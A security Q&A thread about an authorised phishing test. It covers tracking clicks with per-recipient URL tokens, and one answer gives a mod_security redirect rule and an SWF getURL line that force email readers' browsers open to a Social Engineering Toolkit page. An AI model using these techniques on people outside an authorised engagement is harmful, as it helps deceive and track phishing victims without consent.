# How do I obtain user info from SET?

Tags: penetration-test, social-engineering, phishing

I am trying to create a phishing email for a project I am on. In the email I want to link to a site that will collect IP, browser, date/time of when visited. nothing malicious but to just prove that users clicked the link. 
Can I do this in social engineering toolkit or is it not possible?

Comment: If your only problem is the collection of those informations, you could simply set up a webserver. Apache, for example, stores all of that without further configuration.

Answer (score 1, accepted):

The simplest method is to put a user-custom token in each copy of the phishing email.  For example, a Groupon mailing in my inbox has the following link - I've inserted a bunch of newlines between the individual fields of the URL-encoded string.  You can see that there is a "user" field with a 64-byte hexadecimal string - that's the unique identifier that tells Groupon that it's me when I click on their email to look at the deal on their website.

```
http://www.groupon.com/deals/jimmy-s-famous-pizza-and-golfland-usa?
p=1
&utm_source=newsletter
&utm_medium=email
&sid=3cc714b9-fd5b-4d66-bead-e7c2e20d21bd
&division=boston
&user=03c1384e250d6c131d9b8948b6c5d536d26d9b0beb33f1fa5b6191e323b87c63
&date=20130522
```

So when I click to go to their site, they know I'm there because they sent a newsletter to (someone) via email on May 22nd.  They assume (someone) is me, because of that user string; of course, if I forward the email to my friends, and they click, then the web site will get that user string from them... so this is only a loose connection.  If you're phishing, however, it's really the closest you'll get without getting them to do more than just click on a link.

Answer (score 1):

gowenfawr gave a concise answer however, I will go a step further here. Depending on what e-mail client the user has, you could force them to visit a site like it or not. It involves embedding a JPG or GIF, a server, and mod_security.

In the instance described above, you could embed say "*logo.jpg*" into your signature. IF the user has an email that allows for displaying remote content (html in the email), you can tell mod_security: "hey, whenever someone asks for logo.jpg, give them **logo.swf**" where logo.swf performs a getURL to open a browser.

```
SecFilterSelective REQUEST_URI "/logo.jpg" redirect:http://loaded-web-site.com/logo.swf
```

Inside the swf file you could put whatever you want:

```
getURL("social-engineering-toolkit-page.html", "_blank", "GET");
```

All depends on how much time you want to spend, how much effort you put in, etc.